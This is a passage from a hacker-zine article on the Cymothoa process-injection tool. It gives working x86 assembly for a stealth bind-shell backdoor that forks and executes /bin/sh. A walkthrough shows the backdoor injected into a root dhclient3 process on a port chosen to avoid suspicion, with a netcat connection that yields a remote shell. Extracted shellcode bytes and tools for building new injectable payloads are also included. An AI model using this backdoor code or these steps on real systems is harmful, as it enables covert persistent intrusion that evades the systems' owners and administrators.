	# call to sys_close(socket file descriptor)
	# (since is used only by the child process)
	xorl    %eax, %eax
	mov     $6, %al
	mov     %edx, %ebx
	int     $0x80

	# call to sys_waitpid(-1, NULL, WNOHANG)
	# (to remove zombie processes)
	xorl    %eax, %eax
	mov     $7, %al
	xorl    %ebx, %ebx
	dec     %ebx
	xorl    %ecx, %ecx
	xorl    %edx, %edx
	mov     $1, %dl
	int     $0x80

	# alarm(timeout)
	xorl    %eax, %eax
	mov     $27, %al
	movl    $0x53434553, %ebx    # replaced by the injector (seconds)
	int     $0x80

	# return
	popa
	ret

dup2_multiple_calls:
	# dup2(socket, 2), dup2(socket, 1), dup2(socket, 0)
	xorl    %eax, %eax
	xorl    %ecx, %ecx
	mov     %edx, %ebx
	mov     $2, %cl
dup2_loop:
	mov     $63, %al
	int     $0x80
	dec     %ecx
	jns     dup2_loop

execve_call:
	# call to sys_execve(program, *args)
	xorl    %eax, %eax
	mov     $11, %al
	jmp     program_path
load_program_path:
	pop     %ebx
	# create argument list [program_path, NULL]
	xorl    %ecx, %ecx
	push    %ecx
	push    %ebx
	mov     %esp, %ecx
	mov	%esp, %edx
	int     $0x80

program_path:
	call load_program_path
	.ascii  "/bin/sh"

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

A little summary of the code:
1) Half preable, only the signal() part.
2) Check to see if it's the first execution. This step makes use of a
   persistent memory location, provided by the injector.
2.1) If already initialized jump to 7
2.2) If not initialized continue
3) Open socket.
4) Set nonblocking using fcntl().
5) Bind socket to the specified port.
6) Socket in listen mode with listen().
7) Check if a client is connected using accept().
7.1) No clients, jump to 9
7.2) Client connected, continue
8) Fork() a child process and execute a shell.
9) Set the timer and resume host execution
   (the second half of the preamble)

For this shellcode the provided arguments are a persistent memory
address, the port to listen on and the timer (in seconds).

Finally, let's see a practical example of use.

First, we must identify our host process. We need also to find a door is
not likely to arouse suspicion.

root@victim# lsof -a -i -c dhclient3
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient3 1232 root    5u  IPv4   4555      0t0  UDP *:bootpc
dhclient3 1612 root    4u  IPv4   4554      0t0  UDP *:bootpc

Here we can see two dhclient3 processes with port 68/UDP open (bootpc): a
good strategy for our backdoor is to listen on port 68/TCP...

root@victim# ./cymothoa -p 1612 -s 13 -j 1 -y 68
[+] attaching to process 1612

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffdfe   ebx value: 0x6
 esp value: 0xbfff6dd0   eip value: 0xb7682430
 ------------------------------------------------------------

[+] new esp: 0xbfff6dcc
[+] injecting code into 0xb7683000
[+] copy general purpose registers
[+] persistent memory at 0xb769f000 (if used)
[+] detaching from 1612

[+] infected!!!

Let's see the result:

root@victim# lsof -a -i -c dhclient3
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient3 1232 root    5u  IPv4   4555      0t0  UDP *:bootpc
dhclient3 1612 root    4u  IPv4   4554      0t0  UDP *:bootpc
dhclient3 1612 root    7u  IPv4  21892      0t0  TCP *:bootpc (LISTEN)

As you can see it is very difficult to see that something is wrong...

Now the attacker can connect to the victim and get a shell:

root@attacker# nc -vv victim_ip 68
Connection to victim_ip 68 port [tcp/bootpc] succeeded!
uname -a
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux

We have achieved our goal: a single process backdoor :)

------[ 6. Something about the injector

In all these examples we always used the injector cymothoa [3].
Some notes about this tool...

The injector is very important because it allows the customization of the
shellcode and its injection in the right areas of memory.

Cymothoa wants to be an aid to developing shellcode, in several ways.

In the payloads directory there are all the assembly sources created by the
author, easily compilable with gcc:

root@box# cd payloads
root@box# ls
clone_shellcode.s            fork_shellcode.s
scheduled_backdoor_alarm.s   mmx_example_shellcode.s
scheduled_setitimer.s        scheduled_alarm.s
scheduled_tail_setitimer.s
root@box# gcc -c scheduled_backdoor_alarm.s
root@box#

Cymothoa includes also some tools to easily extract the shellcode from
these object files.

For example bgrep [6], a binary grep, that allows to find the offset of
of particular hexadecimal sequences:

root@box# ./bgrep e8f0ffffff payloads/scheduled_backdoor_alarm.o
payloads/scheduled_backdoor_alarm.o: 0000014b

This is useful for finding the beginning of the code to extract.

Once you locate the beginning and the length of the code, you can easily
turn it into a C string with the script hexdump_to_cstring.pl.

root@box# hexdump -C -s 52 payloads/scheduled_backdoor_alarm.o -n 291 | \
          ./hexdump_to_cstring.pl
\x60\x31\xc0\x31\xdb\xb0\x30\xb3\x0e\xeb\x08\x59\x83\xe9\x18\xcd\x80\xeb
\x05\xe8\xf3\xff\xff\xff\xbe\x50\x4d\x45\x4d\x8b\x06\x3d\xef\xbe\xad\xde
\x0f\x84\x81\x00\x00\x00\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xeb\x14\x59\xcd
...

Once this is done you can add this string to the file payloads.h, and
recompile cymothoa, to have a new, ready to inject, parasite.

If you want to transform into parasite code you already have available,
that's the easy way.

The last thing I want to mention about cymothoa, is a little utility
shipped with the main tool: a syscall code generator.

Writing syscall based shellcodes can be a tedious work, especially if
you must remember every syscall number and parameters.

Since I am a lazy person, I've written a script able to do part of
the hard work:

root@box# ./syscall_code.pl
Syscall shellcode generator
Usage:
        ./syscall_code.pl syscall

For example you can use it to generate the calling sequence for the
open syscall:

root@box# ./syscall_code.pl sys_open
sys_open_call:
        # call to sys_open(filename, flags, mode)
        xorl    %eax, %eax
        mov     $5, %al
        xorl    %ebx, %ebx
        mov     filename, %bl
        xorl    %ecx, %ecx
        mov     flags, %cl
        xorl    %edx, %edx
        mov     mode, %dl
        int     $0x80

As you can see the script generates assembly code that marks arguments and
corresponding registers of the syscall, as well as the call number.

The code is not always 100% reliable (e.g. some syscalls require complex
structures the script is not able to construct), but it can  greatly speed
up the shellcode development phase.

I hope you'll find it useful...

------[ 7. Further reading

While I was writing this article, on the defcon's website have been
published the talks which will take place during the next edition.

One of these caught my attention [7]:

     Jugaad - Linux Thread Injection Kit

   "... The kit currently works on Linux, allocates space inside
    a process and injects and executes arbitrary payload as a
    thread into that process. It utilizes the ptrace() functionality
    to manipulate other processes on the system. ptrace() is an API
    generally used by debuggers to manipulate(debug) a program.
    By using the same functionality to inject and manipulate the
    flow of execution of a program Jugaad is able to inject the
    payload as a thread."

I recommend all readers who have judged this article interesting, to follow
this talk, because it is a similar research, but parallel to mine.

My goal was to implement a stealth backdoor without creating new processes
or threads, while the research of Aseem focuses on the creation of threads,
to achieve the same level of stealthiness.

I therefore offer my best wishes to Aseem, since I think our works are
complementary.

For additional material on "injection of code" you can see the links
listed at the end of the document.

Bye bye ppl ;)

Greetings (in random order): emgent, scox, white_sheep (and all ihteam),
sugar, renaud, bt_smarto, cris.

------[ 8. Links and references

[0] https://secure.wikimedia.org/wikipedia/en/wiki/Ptrace
[1] http://dl.packetstormsecurity.net/papers/unix/elf-runtime-fixup.txt
[2] http://www.phrack.org/issues.html?issue=58&id=4#article
    (5 - The dynamic linker's dl-resolve() function)
[3] http://vxheavens.com/lib/vrn00.html#c42
[4] http://cymothoa.sourceforge.net/
[5] http://www.exploit-db.com/exploits/13388/
[6] http://debugmo.de/2009/04/bgrep-a-binary-grep/
[7] https://www.defcon.org/html/defcon-19/dc-19-speakers.html#Jakhar

------[ EOF